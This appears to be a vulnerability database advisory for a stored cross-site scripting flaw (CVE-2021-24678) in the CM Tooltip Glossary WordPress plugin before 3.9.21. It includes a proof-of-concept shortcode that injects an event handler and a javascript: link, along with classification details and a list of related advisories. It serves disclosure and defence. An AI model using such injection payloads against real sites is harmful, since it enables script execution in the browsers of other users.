CM Tooltip Glossary < 3.9.21 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24678 | Plugin Vulnerabilities

Description

The plugin does not escape some glossary_tooltip shortcode attributes, which could allow users a role as low as Contributor to perform Stored Cross-Site Scripting attacks

Proof of Concept

[glossary_tooltip dashicon='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS-enhanced-tooltipglossary_dashicon/)//' link="javascript:alert(/XSS-enhanced-tooltipglossary_link/)"]Click me[/glossary_tooltip]

Affects Plugins

enhanced-tooltipglossary

Fixed in 3.9.21

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

b83880f7-8614-4409-9305-d059b5df15dd

Timeline

Publicly Published

2021-09-06 (about 2 years ago)

Added

2021-09-06 (about 2 years ago)

Last Updated

2023-01-29 (about 1 years ago)

Other

Published

Title

Published

2024-03-12

Title

Burst Statistics < 1.5.7 - Contributor+ Stored Cross-Site Scripting via burst_total_pageviews_count

Published

2023-12-26

Title

Advanced Access Manager < 6.9.16 - Contributor+ Stored XSS

Published

2021-06-16

Title

WP Reset < 1.90 - Authenticated Stored XSS

Published

2023-12-05

Title

Cookie Bar < 2.1 - Authenticated (Administrator+) Stored Cross-Site Scripting via settings

Published

2022-08-17

Title

WP STAGING < 2.9.18 - Admin+ Stored Cross-Site Scripting